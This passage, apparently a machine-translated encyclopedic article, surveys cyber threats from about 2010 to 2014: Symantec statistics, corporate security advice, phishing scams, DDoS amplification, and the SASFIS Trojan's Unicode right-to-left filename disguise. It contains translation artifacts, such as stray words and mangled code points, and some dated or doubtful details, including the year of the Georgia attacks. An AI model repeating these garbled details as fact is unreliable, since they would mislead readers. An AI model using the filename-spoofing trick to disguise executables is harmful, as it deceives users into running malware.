Vladimir Chizhov, Russia's permanent representative to the European Union, then criticized this position. "This type of threat can be successfully carried out only on the basis of international cooperation," he said.

Meanwhile, the report said some of Russia's efforts to regulate cyber security are having a positive effect. These are new legislative acts in defense of personal data, the development of a digital signature, as well as a change in the procedure for registering domain names (previously it was carried out without any verification).

2010: Symantec Data

In 2010, Symantec discovered more than 286 million new threats. Such a huge number of threats were accompanied by the emergence of several new important trends. Firstly, in 2010 there was a sharp increase in both the frequency and sophistication of targeted attacks on enterprises. Secondly, social networks began to be used by attackers as platforms for spreading attacks. Thirdly, the attackers changed their tactics - they increasingly began to exploit Java vulnerabilities to hack traditional computer systems. Finally, there has been a sharp increase in the interest of fraudsters in mobile ^[49]

Year of targeted attacks

Targeted attacks such as Hydraq and Stuxnet posed a growing threat to businesses in 2010. To successfully and imperceptibly penetrate the computer networks of enterprises, attackers used previously unknown vulnerabilities (the so-called zero-day vulnerabilities). And, for example, Stuxnet used four such vulnerabilities at once to carry out an attack.

In 2010, attackers attacked a number of diverse large multinationals and government agencies, as well as surprisingly many small companies. Often, attackers collected information about specific employees of the attacked corporation, and then developed an individual approach to a specific victim (mainly using social engineering methods) to gain access to the network of the victim company. Thanks to this targeted nature, many of these attacks were successful even against such organizations where basic security measures were observed.

The highly publicized targeted attacks of 2010 aimed to steal intellectual property or cause physical damage. However, many lesser-known targeted attacks also targeted individuals to gain access to their personal information. According to the report, on average, in 2010, one successful hack led to 260,000 people getting into the public domain of personal data.

Social media: fertile ground for cyber crime

The popularity of social media continues to grow, and malware creators could not ignore it. Most often, attackers use short URLs, which are usually used to reduce the number of characters in a message on the same X Corp (formerly Twitter) e, a more accurate kind of long link on the site or in a letter. In 2010, scammers spread millions of such links on social networks in order to lure users to phishing sites or infect them with a virus or other malware. This provoked an increase in the number of cases of successful infection.

The report notes that attackers have maximized the capabilities of news feeds of popular social networks for massive malicious activities. A typical scenario looked like this: an attacker logs into a hacked social network account and posts a short link to a malicious website in status. The social media site then automatically sends the link to the victim's friends' news streams, thus spreading it to hundreds or thousands of victims within minutes. Symantec recorded that in 2010, 65% of malicious links in news streams used short URLs. Of these, 73% were clicked more than 10 times, and 33% - from 11 to 50 times.

Ready-made attack tools focused on Java

Exploit sets for attacks are computer programs that can be used by both advanced hackers and beginners to facilitate the launch of large-scale attacks. Such tools were widely used in 2010 and increasingly exploited Java vulnerabilities, which accounted for 17% of all web browser plugin vulnerabilities in 2010. As a popular multi-platform technology that is not tied to a browser type, Java remains an attractive target for cybercriminals.

The Phoenix set became the basis for most of the web attacks carried out in 2010. It, like many other sets, also contains elements that exploit Java vulnerabilities. During the reporting period, the top 6 web attacks were used by exposures to Java vulnerabilities.

The number of web attacks recorded daily in 2010 increased by 93% compared to 2009. And, given that two-thirds of all these threats were created using off-the-shelf toolkits, Symantec said, they could have caused such a sharp increase.

The scheme of actions of attackers in the mobile space is being clarified

The ubiquity of mobile platforms has reached a level where attackers simply cannot ignore it. In this regard, Symantec expects an increase in the number of attacks on these platforms. In 2010, mobile devices were attacked mainly by Trojan programs disguised as legitimate applications. And although some of these programs were developed by cybercriminals "from scratch," in many cases, user infection occurred by fitting malicious algorithms into the original official applications. The attackers then distributed these infected apps through public online stores. For example, this is the method used by the authors of Pjapps Trojan.

Despite the fact that the new security architectures used in modern mobile devices are not inferior in efficiency to desktop computers and servers, attackers often manage to bypass this protection by exploiting internal vulnerabilities of mobile platforms. Unfortunately, such shortcomings are quite common: during 2010, Symantec discovered 163 vulnerabilities that could be exploited by attackers to gain partial or complete control over devices using popular mobile platforms. During the first months of 2011, attackers already took advantage of these flaws to infect hundreds of thousands of devices.

Threat Landscape - Basic Figures and Facts

• 286 million new threats - 2010 was characterized by a multi-image, malware as well as the emergence of new mechanisms for its spread, which caused a further increase in the number of malicious technologies. In 2010 Symantec , faced more than 286 million unique variants of malicious; ON
• The number of web attacks increased by 93% - The number of ready-made tools for carrying out web attacks increased by 93% in 2010. This was also facilitated by the widespread use of short URL services;
• 260,000 "loss of life" per successful attack - This is the average number of people whose personal data was in the public domain after the hack in 2010;
• 14 new zero-day vulnerabilities - zero-day vulnerabilities have played a key role in targeted attacks such as Hydraq and Stuxnet. Only Stuxnet exploited four different zero-day vulnerabilities;
• 6,253 new vulnerabilities - In 2010, Symantec documented more vulnerabilities than in any previous reporting period;
• The number of detected mobile vulnerabilities increased by 42% - A sign that cybercriminals are beginning to focus on the mobile space was an increase in the number of recorded new vulnerabilities in mobile operating systems from 115 in 2009 to 163 in 2010;
• 1 botnet with more than 1 million spambots - In 2010, there was a period when Rustock, the largest botnet observed in 2010, controlled more than one million bots. Other botnets - such as Grum and Cutwail - were not far behind, controlling many hundreds of thousands of bots each;
• 74% of spam was related to pharmaceutical products - In 2010, approximately three quarters of all spam was advertising for pharmaceuticals;
• $15 for 10,000 bots - Monitoring shadow market ads in 2010, Symantec found 10,000 bots were selling for as little as $15. UNITED STATES . Bots are usually used to spam and distribute false software, but recently they have been increasingly used for DDOS attacks.
• From $0.07 to $100 per credit card - In 2010, prices for credit card details on underground forums varied in a wide range. Factors that dictated the price were the rarity of the card and discounts on wholesale purchases.

Measures against cybercriminals

To effectively counter this threat, which has grown so dramatically in recent years, companies need to consider information security as one of the key components of their operations. The most priority should be the issue of responsibility. As soon as the information security problem has become strategically important, the company's board members should pay paramount attention to solving this difficult problem.

One of the first important steps should be the introduction of the position of director of information security into the organizational structure of the company. The Director of Information Security or Head of Security is generally not on the board, but they must have direct access authority and report either directly to the board or to an officer who is at most one notch below the board in the hierarchy of subordination. The Information Security Director is obliged to inform senior managers of the importance of information security measures and to ensure the allocation of the necessary resources. The next decision made at the company's management level is to list the data and systems whose protection is paramount. After identifying the departments and systems that need protection, scenarios for countering attacks are developed, taking into account the list of potential attackers, their goals, temporary and financial resources. Along with this, after risk assessment, an information security management system should be implemented.

It is important that all departments are properly involved in all of these steps. Another significant point is information work among the organization's staff. It is necessary that each employee has basic knowledge of information security - in this case, it will be possible to counteract at least the simplest tricks that are often used by attackers, such as sending malware in email applications. Technology alone is not enough yet; their role is only to help people make the right decisions and make the right actions.

Install Firewall

Each (including a small) firm must have a firewall that restricts access to its network. This is your first line of defense.^[50]

Ensure access control

The use of the Internet by office employees should be carefully monitored. In addition, organizations must have an antivirus and content filtering gateway, which will become their second line of defense.

Conduct regular checks

Network administrators or managers should review all user accounts and data access rights every month or at least once a quarter.

Don't forget about physical protection

Protection is not limited to data inside the computer. Organizations must also provide physical protection for their equipment. All visitors to your office should be accompanied by someone from the staff, and monitor screens should not be available to view from the corridor.

Passwords must be secure

Organizations must ensure that strong passwords are selected; this means a certain level of their complexity and periodic change. The password from the mother's maiden name is no good.

Don't skimp!

If you can afford it, hire a data protection specialist (s). In addition, the budget should provide money for equipment and software to protect against cybercriminals.

Teach staff vigilance

Office staff need to be taught to be vigilant. A few simple rules can significantly improve security in your company: never go directly to an unknown website whose address is sent to you in the mail, delete any dubious letters and never click the links sent to you. Instead, you should search through Google on this topic and from there try to find the site you need.

Integrated approach

Many of the techniques used earlier in attacks on home users have now been used in relation to business. These are modified banking Trojans that target employees of financial departments and accounting departments, and various encryption programs that began to work within corporate information networks. In addition, network worms have gained popularity, the removal of which requires the shutdown of the entire corporate network. When a similar problem is encountered by companies with many branches located in different time zones, network shutdown inevitably leads to financial losses^[51].

According to the results of a study conducted by Kaspersky Lab"" in 2014, among information security specialists, most often Russian companies face malware, ON spam, phishing. Separately, it is worth noting internal threats, among which the most serious problems are caused by vulnerabilities in the installed software, as well as accidental data leaks due to the fault of employees and the work of insiders.

Don't trust the "kings" of social engineering

No technical means will protect against the use of social engineering methods. Crackers collect data armed with knowledge of human psychology. They send malicious links to the new composition of their favorite music group on social networks or send a letter to the accountant with the application "reconciliation act," in which the virus is actually hidden.

A separate direction in this area can be noted the so-called "Nigerian spammers." They send letters asking for help in banking transactions related to the transfer of money allegedly subject to a large tax, report the recent death of a very rich person "with the same surname" as the recipient of the letter, and offer to assist in obtaining money from the bank account of the deceased.

The only opposition to such attacks is to completely ignore the message. Even if a user engages in correspondence with this kind of hacker in order to just write a refusal, then he thereby confirms his email address. Subsequently, attackers can use it for other, more ingenious mailings.

To counter attacks using social engineering methods, regular training of all employees of the company for safe work on the Internet and informing them about existing types of threats helps.

Protect against DDoS attacks, viruses, Trojans, and phishing

The number of powerful DDoS attacks is growing rapidly. Such hacker attacks can "put" the company's website for a long time and deprive its owner of income. Thus, a study by Arbor Networks says that in the first half of 2014, more than 100 incidents with a capacity of more than 100 Gb/s were recorded. The number of attacks in the range of more than 20 GB/s in the II sq. twice the figure for the entire last year.

This is also confirmed by the data of Kaspersky Lab, which in the spring of 2014 recorded a new jump in the power of DDoS attacks on the Runet. In the spring, a group of attackers organized a serious attack, choosing several sites of leading Russian banks, large companies and government agencies as their targets. Then the average attack power was 70-80 Gb/s, and at peak moments exceeded 100 Gb/s. These indicators became a record for Runet - just a year ago, the most powerful DDoS attack in the Russian segment of the network did not exceed the threshold of 60 GB/s.

A significant increase in the power of DDoS attacks was due to the spread of a new method among attackers - NTP Amplification. Its advantage is a significant gain (up to 556 times), which allows hackers to quickly achieve high attack power with minimal effort. For comparison, the sensational attacks a year ago were carried out using the DNS Amplification method, the gain of which is 10 times less - up to 54 times. In addition, Amplification allows attackers to hide their real address, which makes them difficult to identify.

Ensuring protection against DDoS attacks in-house is a difficult task for large businesses and almost unbearable for the SMB sector. The company must have the necessary resources, both human and material: two specialized specialists for shift work, expensive equipment and connection to high-speed communication channels. It should be borne in mind that DDoS is not a constant threat, you must be prepared for the fact that the equipment will be idle, and the work of specialists will not be in demand. Therefore, it often becomes more profitable to use the services of third-party companies specializing in protection against such attacks by connecting to cloud services.

PHP site owners

To protect the resources of their companies, it is important for businessmen to remember that the most unsafe sites, according to a recent study by Positive Technologies, are written in PHP, since 76% of them contain critical vulnerabilities. Web resources in Java (70%) and ASP.NET (55%) were less vulnerable.

Accordingly, sites most susceptible to attacks should be more careful about their security level. For example, it is worth strengthening the security against matching user identifiers or passwords (Brute Force attack).

Signed certificates

Corporate network administrators must control which applications employees use and which sites they visit - they must have valid (valid or signed) SSL certificates. These certificates are divided into three types of validation - confirming only the domain name, domain and organization, as well as certificates with extended verification. The best option is a certificate with extended verification, which has the so-called "green bar." When you enter the site where such a certificate is installed, a green bar with the name of the organization that received the certificate will appear in the address bar of the visitor's browser.

The last time users of IT products with invalid SSLs were threatened was when at least 350 mobile apps were found in Google Play and Amazon online stores with a man-in-the-middle attack vulnerability. During such an attack, the cracker, having connected to the channel between the counterparties, can get the transmitted information. For example, a hacker can intercept the credit card data of users who use mobile applications that involve electronic payments.

Be alert

Although technology increases the level of security of a computer, one should not forget about vigilance, for example, when receiving emails. Hackers often hide behind messages from travel services like Airbnb, Booking.com, write on behalf of airlines, inform the user that his credit card has paid for a plane ticket, and offer a link to a phishing site where you can allegedly find out information about the upcoming flight.

In September 2014, in the plots of "Nigerian" letters, "Kaspersky Lab (Kaspersky)" noted references to Ebola patients in Africa and unusual invitations to the World Health Organization (WHO) conference. The purpose of the fraudsters, as usual, was to lure funds from gullible recipients who entered into correspondence with the authors of the letters.

In October 2014, it was the turn of cybercriminals who used the hype around the Ebola virus to send malicious emails. Again, WHO was listed as the sender. In the text of the letters discovered by experts, the attackers tried to convince the recipient that WHO had prepared a file with general information and precautions that would help protect the user and others from the deadly virus and other diseases.

In addition to exploiting topics that are relevant to society, spammers also send fake receipts from online stores that bill for a completed purchase, which can only be canceled on a phishing site. The statistics of phishing attempts are not comforting: according to the Anti-phishing system developed by Kaspersky Lab, the number of positives amounted to almost 19 million in September 2014 alone.

In modern conditions, companies need to use a set of software and hardware that would ensure an acceptable level of infrastructure security while maintaining sufficient efficiency of business processes. These tools include antivirus software, intrusion prevention systems, firewalls, device control and Internet access modules, data encryption systems, mobile device management, means to protect mail servers and collaboration systems, and so on.

In addition, it is important to remember that information security does not end only with the introduction of protective equipment, it is also necessary to regularly train employees on the rules for safe work with information in electronic form, to implement correct policies and rules when working with confidential data. It is important for users to remember the golden rules: do not follow dubious links, come up with complex passwords for accounts, do not open attachments in letters and, of course, put comprehensive protection on a computer.

Key types of Internet threats

The pace of innovative development with such a competition of "offensive" and "defensive" technologies is very high. More than 100,000 new malware samples are being developed every day. software Some malicious software modules are now being paid in excess of a million. dollars Cybercriminals are ready to pay such money, because they are sure that the invested funds will be able to pay off very quickly.

Another threat to information security is the new arms race unfolding in cyberspace, during which, in particular, sabotage acts and cyber attacks are carried out. The information about the world's largest intelligence program PRISM, which has recently become public, has significantly undermined the credibility of large cloud service providers based in the United States. Trust has declined especially in Europe, where there has traditionally been a strong focus on data protection. According to the expert analytical organization InformationTechnologyandInnovationFoundation (Washington, DC), US-based cloud service providers may, as a result, receive less revenue in the amount of $22 billion to $35 billion from 2014 to 2016.

Spam - along with traditional advertising mailings, there is malicious spam, for example, containing spyware ON or spam, luring users to sites with malicious content.

Targeted phishing - Unlike spam, targeted phishing directly targets narrow groups of users and contains messages with a social context urging a potential victim to open an executable file or go to a site containing malicious code..

PDF attacks - Recently, many serious vulnerabilities have been discovered in PDF documents.

SEO (Search Engine Optimization) poisoning - threats to optimize the search engine lead to the fact that sites containing malicious code are substituted for high places in search engines ratings when entering a request related to the world championship. You can protect yourself from such threats using the latest versions of gateway antivirus and prevention systems, intrusions.

Loss of performance - Administrators can use traffic management or content filtering systems to restrict or block access to online resources.

Social media - Analysts warn of malware that can spread through popular social media. Content filtering and file blocking solutions must be configured to minimize threats.

According to IBM X-Force, the main source of threats is still such popular software as Internet browsers. A novelty of the attacks of recent years has been the transfer of the efforts of hackers from browsers to web applications, through which you can directly access the databases of companies of particular value. The percentage of vulnerabilities eliminated is consistently low - up to 60% of vulnerabilities discovered annually do not have special patches (patches) from software manufacturers at the end of the year.

The accounts of privileged users, that is, system administrators, are most at risk. Today, controlling the actions of privileged users is a mandatory requirement on the part of various standards and regulators. Illegal actions against them can be carried out both from outside the company and by unscrupulous employees themselves. The increase in the number of threats associated with privileged users is, among other things, insider threats, when employees either deliberately steal data from their company, or inadvertently allow others to do so.

Fraud scheme No. 419 is being revived under the name "FBI" (according to Trend Micro).

Computer criminals have come up with another way to attract the attention of users. This time, they impersonate employees of the Federal Bureau of Investigation (USA) from Washington and attempt fraud through spam.

As with any other fraud attempt, in this scheme, the sender of the email is impersonating another person. The sender claims he is writing from the FBI. The message itself contains information that its recipient is entitled to a payment of $10.5 million. Then the fraudster posing as an FBI employee gives the recipient of the message instructions to contact the head of the "Internet transfer department" of United Trust Bank London. The report states that the said boss is the only person who decides to pay this multi-million dollar amount. Moreover, the message states that all recipients must clearly follow the instructions for issuing an application for payment. Of course, the message contains false information. The note at the end of the message looks especially ironic and indicates that cybercriminals are able to take extreme measures in trying to succeed. In it, the recipient is advised to beware of scammers who may try to contact him. In order not to become a victim of such fraud, you must always pay attention to the smallest details in the messages received. One close look is enough to distinguish a real message from a fake. You just need to take a closer look.

The SASFIS Trojan uses a new trick (according to Trend Micro).

In early 2010, the Trojan program SASFIS, sent in fake emails allegedly sent from Facebook, earned notoriety. SASFIS infection entails the installation of a huge number of other malware, because this family of malware makes systems vulnerable to botnet attacks, especially ZeuS and BREDOLAB, and is associated with various variants of fake antiviruses, usually with those related to pornographic sites.

TrendLabsSM engineers discovered a new version of SASFIS, which uses the right- to-left override (RLO) method, which is a Unicode inversion of text that was previously popular among spammers, but has now become used as a new social engineering tactic.

The SASFIS Trojan program is distributed through spam as an.RAR application with an.XLS file inside. After extraction, the.XLS file looks like a typical MS Excel document. In fact, it is a screen saver that identifies as TROJ_SASFIS.HBC. This Trojan program activates the BKDR_SASFIS.AC program, which allows you to inject malicious branches into the normal svchost.exe process. Although the file looks like an Excel document, it contains a binary Win32 header, which only executable files have. The real name of the file (except for Chinese characters) looks like this: phone & mail). [U + 202e} slx.scr, where U + 202e ― the Unicode control character, which gives the system the command to interpret subsequent characters from right to left. Thus, for users, the file name will look like this: phone & mail).xls.scr. This will make them believe it is indeed an Excel file and therefore it is "safe" to open. Although in reality it is an executable.SCR file.

This method allows other file names to be used for the same purposes, such as BACKS [U + 2020e] FWS.BAT and I-LOVE-YOU-XOX [U + 2020e] TXT.EXE, which masquerades as BACKSTAB.SWF and I-LOVE-YOU-XOXEXE.TXT. In the first case, the package file is masqueraded as Adobe; in the second case, the ― executable is disguised as a text file.

To prevent this attack, users can use proven protection methods: do not open suspicious emails or download applications with executable files.

History of major incidents

• September 2003. Taiwan was hit by Trojans sent from Chinese provinces and damaged the networks of ten private companies.

• In April 2007, Estonian Foreign Minister Urmas Paet accused the Russian authorities of hacker attacks that paralyzed the operation of the exchange, hospitals, websites of government agencies and the media.

• From the same network addresses used against Estonia, attacks were carried out on the computer systems of oil pipelines Georgia in August 2009.

• In January 2010, Google accused China of spying through the email accounts of journalists and dissidents.

• According to British media (February 2012), Russian hackers sell account numbers and passwords from payment cards to a large number of UK residents. British data are sold on Russian web sites for $30.

Information from UK residents became available after Russian attackers created a database on the Internet. For $300, hackers also offer access to a valid bank account in the UK with a credit limit of up to $13 thousand. Attackers steal confidential information by sending malware to users' computers. In addition, fraudsters also connect special devices that read information from victims' credit cards in stores and restaurants. After theft, data is transferred to empty cards, which can be paid in those countries that do not use the new technology for identifying the authenticity of the payment means through the built-in microchip, as well as in e-commerce stores.

Notes